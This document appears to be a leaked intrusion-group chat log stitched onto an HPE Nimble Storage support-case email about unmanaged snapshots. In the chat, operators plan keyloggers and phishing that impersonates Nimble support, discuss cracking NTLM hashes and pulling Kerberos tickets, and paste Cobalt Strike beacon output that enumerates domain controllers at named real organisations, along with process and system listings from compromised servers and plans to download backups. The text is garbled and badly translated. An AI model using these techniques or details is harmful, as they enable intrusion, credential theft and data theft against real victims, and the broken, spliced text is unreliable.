Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html

For your convenience, the following is the U.S. support contact information:
Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2
Local: 408-432-9600, extension 2
Email: support@nimblestorage.com

For other international support phone numbers, scroll down to HPE Nimble Support section and expand the "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html

***********************************************************************************
CASE REFERENCE NUMBER REQUIRED - DO NOT MODIFY ref:_00D80aba6._5002H1HQkfz:ref
***********************************************************************************
NOTE: This is an automated alert sent from Salesforce.com. This email message is for the sole use of the intended recipient(s) and contains confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. Alert ID: https://nimblestorage.my.salesforce.com/00X80000001v7Fw

CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``Thank you''.
* Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A

b) Choose appropriate value for the expiration of the unmanaged snapshots and check which snapshots already expired, which ones will expire and when.

NOTE: Negative value shows when snapshots would have already expired, positive value show in what amount of time the snapshots will expire based on value and units checked.

* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours

c) Select snapshots which you prefer to keep for longer than the rest of unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.

* Nimble OS $ snap --edit <snapshot_name> --vol <volume_name> --ttl <numeric_value> --ttl_unit <unit>

Example:
* Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days

d) Change TTL to enabled state and choose appropriate units and value of units.

NOTE: It is recommended to select expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.

* Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
* INFO: Snapshot Time-to-live is set to 30 days.

e) Verify the list of unmanaged snapshots has had expiry time updated as desired:

* Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +8.57 weeks
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +4.29 weeks
``````
A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.

Account Name: Waterway Gas & Wash Company Array SN: AF-180176 Array Name: ww-nimble-01 Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General

Case Subject: Unmanaged snapshot(s) have been detected due to configuration change Case Description: PLEASE NOTE: This is an automatically closed case, if condition is expected, no reply is required.
Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article:

https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4

HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array.
The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection.
In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner.
Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature will be enabled or until they have been removed/deleted manually.
As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space.

There are a few considerations regarding the deletion of unmanaged snapshots; please ensure to review the KB article attached to this case for more details.

To avoid these cases in the future, you may enable Time-To-Live feature (TTL), which is available as of NimbleOS 5.1.x.
The feature will expire the snapshots which are considered unmanaged automatically based on the set period of time.
TTL is enabled manually by the user via CLI only. Following, are the recommended steps to enable the feature:

a) List current snapshots which are unmanaged, note that current expiry is set to "N/A" such as in the example:

``Davaiem... let's better copypaste fullscreen messages from nimblahhhhhhahh helpdesk so they collect some from neighboring pc or predict user input))))120 percent is it so they generate 20 percent garbage in the output?)))we only have 1 chance to make keyloggers work at 120 percent where will flash ctrl look where will copy from if there?
```
[ctrl][v]
[ctrl][v]
``ok, now I get the idea that it's realistic once could bemight think that boganulot to alert about logging in all you have to log in 1 in 1 you catch the pass in the keyloggerwill make them log in no, they will do it differently, write on behalf of nimbla) well I mean, that will pass social engineering if they start to spam each other about nimbla?they send it so a week ago they wrote it is fresh, but it is no different from the old ones that they sent earlier and repeat they send it to each other but the date is fresh?now i will send a screenshot of the letter to my modest count of 3 and many times they forwarded the last letter between them (also was a long time ago) nothing more? a million is how much in our terms? there was only correspondence with the supplier, but it was a million years ago blah blah blah it is for 192.168.0.75 read more carefully i have seenwhen they communicate so did not meet some nimble trust some nimble contactsgkeller there someone explained to someone for nimble as i remember nimble helpdesk tell me who they correspond with regarding nimble files and backups in ortpa no, there are several sessions in slip + build and other things prepare for this time soxda hang a hundred years in 4 start vodokaylogger scattered?no already, no rts check live sessions quicklyg hello, user 3 is delayed where do we have @user3 ? hello:space_invader:hii all in place? hello brothanks bro+user3@tl1 please add @user3 here ntlm hash-stop, and those hashes that rubus pulls can he do tokens with them or not ?@user7 have you skimmed hashes from trusts yet? will we put all hashes on cmd5 and clears into the farm?
i need to feed it with passlists only i will suffer because of this situation with kerbamy i would say if it was brutalized(([ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=bLCSsCf6C9csGXoXh) @tl2 @tl1 did any of this brutalized? look at all they repeat so there is corp.televisa.com.mx and televisa.com.mxS-1-5-21-1935655697-329068152-1801674531
The SIDs of the odin are not
everyone is correct more accurately different....
crap
the structure is weird again, they are different e.g.
dn:CN=tsm.televisa.com.mx,CN=System,DC=corp,DC=televisa,DC=com,DC=mx
dn:CN=tsm.televisa.com.mx,CN=System,DC=televisa,DC=com,DC=mx
``Why are....+ repeated exactly the same way?
Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:33:32> shell nltest /dclist:televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:televisa.com.mx
[+] host called home, sent: 61 bytes
[+] received output:
Get list of DCs in domain 'televisa.com.mx' from '\\TVSASFEDC01.televisa.com.mx'.
    TVSAKIODC01.televisa.com.mx [PDC] [DS] Site: SFE
    TVSASFEDC01.televisa.com.mx [DS] Site: SFE
     TVSAAZDC01.televisa.com.mx [DS] Site: AZURE
     TVSAAZDC02.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:35:46> shell nltest /dclist:corp.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:corp.televisa.com.mx
[+] host called home, sent: 66 bytes
[+] received output:
Get list of DCs in domain 'corp.televisa.com.mx' from '\\CORPKIODC02.corp.televisa.com.mx'.
      CORPSFEDC02.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC03.corp.televisa.com.mx [PDC] [DS] Site: SFE
      CORPSNGDC02.corp.televisa.com.mx [DS] Site: SNG
      CORPSFEDC04.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC02.corp.televisa.com.mx [DS] Site: SFE
    CORPKLHLQDC01.corp.televisa.com.mx [DS] Site: QRO
    CORPKLHLSDC01.corp.televisa.com.mx [DS] Site: SFE
      CORPKIODC04.corp.televisa.com.mx [DS] Site: SFE
       CORPAZDC01.corp.televisa.com.mx [DS] Site: AZURE
       CORPAZDC02.corp.televisa.com.mx [DS] Site: AZURE
      CORPCHADC02.corp.televisa.com.mx [DS] Site: SFE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:36:08> shell nltest /dclist:equiposoi.net
[*] Tasked beacon to run: nltest /dclist:equiposoi.net
[+] host called home, sent: 59 bytes
[+] received output:
Get list of DCs in domain 'equiposoi.net' from '\\SOISFEDC01.equiposoi.net'.
    SOISFEDC01.equiposoi.net [PDC] [DS] Site: Equiposoi
    SOISFEDC02.equiposoi.net [DS] Site: Equiposoi
     AZPRDC010.equiposoi.net [DS] Site: Equiposoi
     AZPRDC009.equiposoi.net [DS] Site: Equiposoi
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:37:31> shell nltest /dclist:filial.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:filial.televisa.com.mx
[+] host called home, sent: 68 bytes
[+] received output:
Get list of DCs in domain 'filial.televisa.com.mx' from '\FILIALSFEDC05.filial.televisa.com.mx'.
    FILIALIALSFEDC05.filial.televisa.com.mx [PDC] [DS] Site: SFE
    FILIALIALSFEDC02.filial.televisa.com.mx [DS] Site: SFE
     FILIALIALAZDC01.filial.televisa.com.mx [DS] Site: AZURE
     FILIALIALAZDC02.filial.televisa.com.mx [DS] Site: AZURE
    FILIALIALSFEDC01.filial.televisa.com.mx [DS] Site: SFE
     Filialazdc03.filial.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:38:08> shell nltest /dclist:tsm.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:tsm.televisa.com.mx
[+] host called home, sent: 65 bytes
[+] received output:
Get list of DCs in domain 'tsm.televisa.com.mx' from '\\TSMSFEDC01.tsm.televisa.com.mx'.
    TSMSFEDC05.tsm.televisa.com.mx [PDC] [DS] Site: SFE
     TSMAZDC01.tsm.televisa.com.mx [DS] Site: AZURE
     TSMAZDC02.tsm.televisa.com.mx [DS] Site: AZURE
    TSMSFEDC01.tsm.televisa.com.mx [DS] Site: SFE
     TSMAZDC03.tsm.televisa.com.mx [DS] Site: AZURE
The command completed successfully

```
the fuckup came out, the trusts are 5, in adinfo they are repeated theydabuild was new?)and if I start the dll there will essentially come only after what time in the bilder was specified `Task SvcRestartTask#27778 22/01/2021 01:38:45 p. Ready `no+systems right yet ? `CORPSFECRT04 `hooked up a session on adinfo 14a how many are there ? or not ?and just in case in some of the trusts fix kinunorm, as soon as the vpn turn on I immediately fix the server (there's the last login was in June 20) and I can only zakrepa youokda fix that on the polzachet, and he hz when your vpn turn onrebildniy shelkodest sessiona you have not fix? found a server where you can fix[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=hfBbb7W5fFJPrsZno) .is there a session alive ? if so can spam it on me, silkod aboveponyalbakapki machines in the lock or in the trashbakapki informationa why do we need them? virtualkuks\machines is a backup of what?yes, most likely we'll take the small ones)):-) let's better take 7.8k backups20 gb backups should we download?)good day) good night everybody good night60 until tomorrow how much tomorrow by 12:-) good guys, let's clean up after ourselves, slip it in and see you tomorrowDBDB Server?
HandleCount Name Priority ProcessId ThreadCount WorkingSetSize

0 System Idle Process 0 0 4 20480

627 System 8 4 97 319488

50 smss.exe 11 268 3 1105920

506 csrss.exe 13 368 9 4775936

79 csrss.exe 13 432 8 3506176

82 wininit.exe 13 440 2 4005888

110 winlogon.exe 13 468 3 5652480

326 services.exe 9 532 6 12713984

837 lsass.exe 9 540 7 17625088

311 svchost.exe 8 648 6 8196096

160 SEDService.exe 8 680 9 11509760

335 svchost.exe 8 740 7 7692288

427 svchost.exe 8 812 12 18022400

303 LogonUI.exe 13 848 11 36507648

172 dwm.exe 13 860 5 54202368

1487 svchost.exe 8 888 42 93220864

659 svchost.exe 8 932 15 13438976

740 svchost.exe 8 1136 18 24133632

353 svchost.exe 8 1280 17 11767808

331 spoolsv.exe 8 1472 11 9891840

97 svchost.exe 8 1504 8 8261632

92 pg_ctl.exe 8 1532 3 5369856

360 postgres.exe 8 1776 3 68055040

42 conhost.exe 8 1784 2 3186688

305 postgres.exe 8 1868 3 5214208

304 postgres.exe 8 1936 2 31318016

303 postgres.exe 8 1944 2 13168640

304 postgres.exe 8 1952 2 13938688

304 postgres.exe 8 1960 2 7790592

304 postgres.exe 8 1968 2 5484544

412 SSPService.exe 8 1296 83 18669568

262 svchost.exe 8 2516 10 11796480

141 tvnserver.exe 8 2548 13 5283840

116 VGAuthService.exe 8 2656 3 10964992

311 vmtoolsd.exe 13 2696 9 91119616

112 ManagementAgentHost.exe 8 2716 9 10297344

153 svchost.exe 8 2740 17 9199616

110 WinCollectSvc.exe 8 2764 4 11280384

992 tomcat7.exe 8 2900 67 607748096

30 conhost.exe 8 2908 2 3112960

324 WmiPrvSE.exe 8 3124 10 22228992

383 svchost.exe 8 3456 19 9252864

109 svchost.exe 8 3600 4 4788224

195 dllhost.exe 8 3772 11 11304960

162 msdtc.exe 8 3860 10 7917568

308 postgres.exe 8 4344 3 9498624

308 postgres.exe 8 4360 3 9510912

308 postgres.exe 8 4376 3 9502720

523 postgres.exe 8 4392 3 50176000

550 postgres.exe 8 4408 3 57700352

313 RouterNT.exe 8 4936 21 9162752

120 GoogleCrashHandler.exe 4 5096 4 1314816

105 GoogleCrashHandler64.exe 4 5116 4 942080

463 WinCollect.exe 8 3576 45 21114880

30 conhost.exe 8 3900 2 3145728

221 WmiPrvSE.exe 8 3764 8 27688960

205 WmiPrvSE.exe 8 4700 7 15343616

328 ManagementAgentNT.exe 8 1524 20 7852032

147 swc_service.exe 8 1056 6 6971392

634 SavService.exe 8 4568 74 391532544

150 SAVAdminService.exe 8 1288 7 3428352

230 swi_service.exe 8 2580 15 20467712

95 swi_filter.exe 8 1748 4 4517888

138 swi_fc.exe 8 976 7 20144128

141 ALsvc.exe 8 1808 7 2506752
``Write in DB+these virtuals``.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10683:04:24
System 4 Services 0 312 K N/A 0:38:33
smss.exe 268 Services 0 1,080 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 368 Services 0 4,664 K NT AUTHORITY\SYSTEM 0:00:28
csrss.exe 432 Console 1 3,424 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 440 Services 0 3,912 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 468 Console 1 5,520 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 532 Services 0 12,416 K NT AUTHORITY\SYSTEM 0:01:19
lsass.exe 540 Services 0 17,168 K NT AUTHORITY\SYSTEM 0:12:01
svchost.exe 648 Services 0 8,004 K NT AUTHORITY\SYSTEM 0:01:00
SEDService.exe 680 Services 0 11,240 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 740 Services 0 7,516 K NT AUTHORITY\NETWORK SERVICE 0:03:24
svchost.exe 812 Services 0 17,636 K NT AUTHORITY\LOCAL SERVICE 1:28:40
LogonUI.exe 848 Console 1 35,652 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 860 Console 1 52,932 K Window Manager\DWM-1 0:00:00
svchost.exe 888 Services 0 91,004 K NT AUTHORITY\SYSTEM 2:47:42
svchost.exe 932 Services 0 13,124 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 1136 Services 0 23,568 K NT AUTHORITY\NETWORK SERVICE 0:01:59
svchost.exe 1280 Services 0 11,484 K NT AUTHORITY\LOCAL SERVICE 0:00:08
spoolsv.exe 1472 Services 0 9,660 K NT AUTHORITY\SYSTEM 0:00:09
svchost.exe 1504 Services 0 8,056 K NT AUTHORITY\SYSTEM 0:00:00
pg_ctl.exe 1532 Services 0 5,244 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1776 Services 0 66,460 K NT AUTHORITY\NETWORK SERVICE 0:00:00
conhost.exe 1784 Services 0 3,112 K NT AUTHORITY\NETWORK SERVICE 0:00:15
postgres.exe 1868 Services 0 5,092 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1936 Services 0 30,584 K NT AUTHORITY\NETWORK SERVICE 0:00:01
postgres.exe 1944 Services 0 12,860 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1952 Services 0 13,612 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 1960 Services 0 7,608 K NT AUTHORITY\NETWORK SERVICE 0:05:19
postgres.exe 1968 Services 0 5,356 K NT AUTHORITY\NETWORK SERVICE 0:00:30
SSPService.exe 1296 Services 0 18,232 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2516 Services 0 11,520 K NT AUTHORITY\SYSTEM 0:00:30
tvnserver.exe 2548 Services 0 5,160 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2656 Services 0 10,708 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2696 Services 0 88,984 K NT AUTHORITY\SYSTEM 1:09:42
managementAgentHost.exe 2716 Services 0 10,056 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2740 Services 0 8,968 K NT AUTHORITY\SYSTEM 0:00:02
WinCollectSvc.exe 2764 Services 0 11,012 K NT AUTHORITY\SYSTEM 1:58:18
tomcat7.exe 2900 Services 0 593,504 K NT AUTHORITY\SYSTEM 1:42:09
conhost.exe 2908 Services 0 3,040 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3124 Services 0 21,804 K NT AUTHORITY\NETWORK SERVICE 1:55:22
svchost.exe 3456 Services 0 9,036 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 3600 Services 0 4,676 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 3772 Services 0 11,040 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3860 Services 0 7,732 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4344 Services 0 9,276 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4360 Services 0 9,288 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4376 Services 0 9,280 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4392 Services 0 49,000 K NT AUTHORITY\NETWORK SERVICE 0:00:18
postgres.exe 4408 Services 0 56,348 K NT AUTHORITY\NETWORK SERVICE 0:00:09
RouterNT.exe 4936 Services 0 8,948 K NT AUTHORITY\SYSTEM 0:00:23
GoogleCrashHandler.exe 5096 Services 0 1,284 K NT AUTHORITY\SYSTEM 0:00:05
GoogleCrashHandler64.exe 5116 Services 0 920 K NT AUTHORITY\SYSTEM 0:00:00
WinCollect.exe 3576 Services 0 20,620 K NT AUTHORITY\SYSTEM 28:12:27
conhost.exe 3900 Services 0 3,072 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3764 Services 0 22,964 K NT AUTHORITY\SYSTEM 0:41:26
WmiPrvSE.exe 4700 Services 0 14,984 K NT AUTHORITY\SYSTEM 0:04:57
ManagementAgentNT.exe 1524 Services 0 7,632 K NT AUTHORITY\SYSTEM 0:03:39
swc_service.exe 1056 Services 0 6,776 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 4568 Services 0 382,324 K NT AUTHORITY\LOCAL SERVICE 1:06:09
SAVAdminService.exe 1288 Services 0 3,348 K NT AUTHORITY\SYSTEM 0:00:03
swi_service.exe 2580 Services 0 20,016 K NT AUTHORITY\SYSTEM 0:00:01
swi_filter.exe 1748 Services 0 4,412 K NT AUTHORITY\SYSTEM 0:00:00
swi_fc.exe 976 Services 0 19,672 K NT AUTHORITY\SYSTEM 0:00:05
ALsvc.exe 1808 Services 0 2,440 K NT AUTHORITY\SYSTEM 0:01:01

``Processes from one to the studio tomcatvot these 4 more?
    TLCAutoTF2.loomisco.com
    TLCANALYTICS1.loomisco.com
    TLCAutoTFR.loomisco.com
    TLCSKLM1.loomisco.com
TLCEPICCS01.loomisco.com
```
there's a description of Applied Epic in this group ```
Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace
``````
Network Card(s): 1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled: No
                                 IP address(es).
                                 [01]: 192.168.0.100

``````
Host Name: EPICAPM
OS Name: Microsoft Windows Server 2012 Standard
OS Version: 6.2.9200 N/A Build 9200
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner:
Registered Organization:
Product ID: 00184-20216-77791-AA002
Original Install Date: 12/30/2015, 3:54:54 AM
System Boot Time: 6/13/2020, 6:34:03 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2594 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 8.032 MB
Available Physical Memory: 6.263 MB
Virtual Memory: Max Size: 9.952 MB
Virtual Memory: Available: 8,052 MB
Virtual Memory: In Use: 1,900 MB
Page File Location(s): C:\pagefile.sys
Domain: loomisco.com
Logon Server: N/A
Hotfix(s): 169 Hotfix(s) Installed.

```VMs''.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10724:49:14
System 4 Services 0 304 K N/A 1:45:28
smss.exe 268 Services 0 1,072 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 356 Services 0 4,744 K NT AUTHORITY\SYSTEM 0:00:16
csrss.exe 420 Console 1 3,628 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 428 Services 0 3,940 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 456 Console 1 5,476 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 520 Services 0 12,584 K NT AUTHORITY\SYSTEM 0:05:33
lsass.exe 528 Services 0 15,956 K NT AUTHORITY\SYSTEM 0:09:39
svchost.exe 640 Services 0 7,644 K NT AUTHORITY\SYSTEM 0:00:15
SEDService.exe 672 Services 0 11,020 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 744 Services 0 7,244 K NT AUTHORITY\NETWORK SERVICE 0:02:27
svchost.exe 796 Services 0 16,680 K NT AUTHORITY\LOCAL SERVICE 1:11:22
LogonUI.exe 832 Console 1 27,584 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 840 Console 1 33,316 K Window Manager\DWM-1 0:00:00
svchost.exe 864 Services 0 73,508 K NT AUTHORITY\SYSTEM 2:19:36
svchost.exe 908 Services 0 12,780 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 1152 Services 0 23,248 K NT AUTHORITY/NETWORK SERVICE 0:01:56
svchost.exe 1292 Services 0 11,396 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1464 Services 0 9,336 K NT AUTHORITY\SYSTEM 0:00:00
armsvc.exe 1496 Services 0 4,312 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.FileServ 1536 Services 0 17,920 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.Listener 1616 Services 0 23,084 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.ProxySer 1672 Services 0 14,720 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Deployment.Inst 1724 Services 0 23,856 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Internals.Share 1820 Services 0 24,416 K NT AUTHORITY\SYSTEM 0:00:00
atashost.exe 1864 Services 0 3,856 K NT AUTHORITY\SYSTEM 0:00:00
cissesrv.exe 1884 Services 0 3,756 K NT AUTHORITY\SYSTEM 0:00:00
HpAmsStor.exe 1908 Services 0 3,600 K NT AUTHORITY\SYSTEM 0:00:00
ProLiantMonitor.exe 1956 Services 0 6,440 K NT AUTHORITY\SYSTEM 0:00:00
SSPService.exe 2124 Services 0 18,096 K NT AUTHORITY\SYSTEM 0:00:01
smhstart.exe 2800 Services 0 7,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2848 Services 0 14,980 K NT AUTHORITY\SYSTEM 0:32:12
tvnserver.exe 2880 Services 0 5,172 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2948 Services 0 10,728 K NT AUTHORITY\SYSTEM 0:00:00
cmd.exe 2956 Services 0 1,928 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 2968 Services 0 2,936 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 2980 Services 0 16,832 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 3004 Services 0 88,820 K NT AUTHORITY\SYSTEM 1:30:18
ManagementAgentHost.exe 3028 Services 0 10,108 K NT AUTHORITY\SYSTEM 0:00:01
hpqams.exe 3060 Services 0 17,176 K NT AUTHORITY\SYSTEM 1:08:07
rotatelogs.exe 3216 Services 0 3,420 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3224 Services 0 3,424 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3304 Services 0 25,580 K NT AUTHORITY\SYSTEM 0:01:52
WmiPrvSE.exe 3312 Services 0 44,804 K NT AUTHORITY\NETWORK SERVICE 1:38:54
hpsmhd.exe 3424 Services 0 18,220 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3532 Services 0 3,456 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 3540 Services 0 3,056 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3564 Services 0 3,436 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 3572 Services 0 3,052 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4024 Services 0 8,664 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 4060 Services 0 4,648 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 296 Services 0 10,888 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 4284 Services 0 7,660 K NT AUTHORITY\NETWORK SERVICE 0:00:00
RouterNT.exe 4568 Services 0 8,744 K NT AUTHORITY\SYSTEM 0:00:13
ManagementAgentNT.exe 2996 Services 0 7,360 K NT AUTHORITY\SYSTEM 0:03:38
swc_service.exe 4796 Services 0 6,660 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 4704 Services 0 389,444 K NT AUTHORITY\LOCAL SERVICE 1:16:05
SAVAdminService.exe 1252 Services 0 3,340 K NT AUTHORITY\SYSTEM 0:00:04
swi_service.exe 2104 Services 0 19,752 K NT AUTHORITY\SYSTEM 0:00:01
swi_filter.exe 5112 Services 0 4,400 K NT AUTHORITY\SYSTEM 0:00:00
swi_fc.exe 3056 Services 0 19,596 K NT AUTHORITY\SYSTEM 0:00:01
ALsvc.exe 788 Services 0 2,352 K NT AUTHORITY\SYSTEM
``So what processes are they? >description: EPIC Dashboard Server (PC)
OU=EPIC SERVICE
Dashboard Server:
    EpicAPM.loomisco.com
Central Server:
    TLCEPICCS01.loomisco.com

MoveIt Server:
    TLCAutoTF2.loomisco.com
    TLCANALYTICS1.loomisco.com
    TLCAutoTFR.loomisco.com
    TLCSKLM1.loomisco.com
``write in isis''.
inetinfo.exe" is a component of Microsoft Internet Information Services (IIS), the popular web server package widely deployed on the Internet
``inetinfo.exe
HandleCount Name Priority ProcessId ThreadCount WorkingSetSize

0 System Idle Process 0 0 4 4096

928 System 8 4 119 143360

51 smss.exe 11 332 2 1245184

423 csrss.exe 13 444 12 4632576

114 csrss.exe 13 536 10 4132864

95 wininit.exe 13 560 1 5029888

157 winlogon.exe 13 604 2 8785920

340 services.exe 9 684 4 10944512

1015 lsass.exe 9 708 8 21753856

503 svchost.exe 8 804 13 15306752

555 svchost.exe 8 868 8 9678848

405 LogonUI.exe 13 952 10 47247360

311 dwm.exe 13 960 9 37392384

450 svchost.exe 8 1008 23 12296192

521 svchost.exe 8 380 20 21225472

426 svchost.exe 8 540 13 17879040

543 svchost.exe 8 664 23 19382272

654 svchost.exe 8 912 20 24899584

422 svchost.exe 8 1168 18 17412096

277 SEDService.exe 8 1184 18 17870848

144 svchost.exe 8 1284 4 6750208

1728 svchost.exe 8 1292 37 61165568

289 WUDFHost.exe 8 1380 6 8069120

659 SavService.exe 8 1956 74 287371264

160 svchost.exe 8 2244 6 7168000

424 spoolsv.exe 8 2448 11 16535552

150 MDM.EXE 8 2640 3 8101888

161 inetinfo.exe 8 2648 5 17334272

337 mqsvc.exe 8 2668 31 13676544

205 svchost.exe 8 2692 6 8470528

373 svchost.exe 8 2700 11 22773760

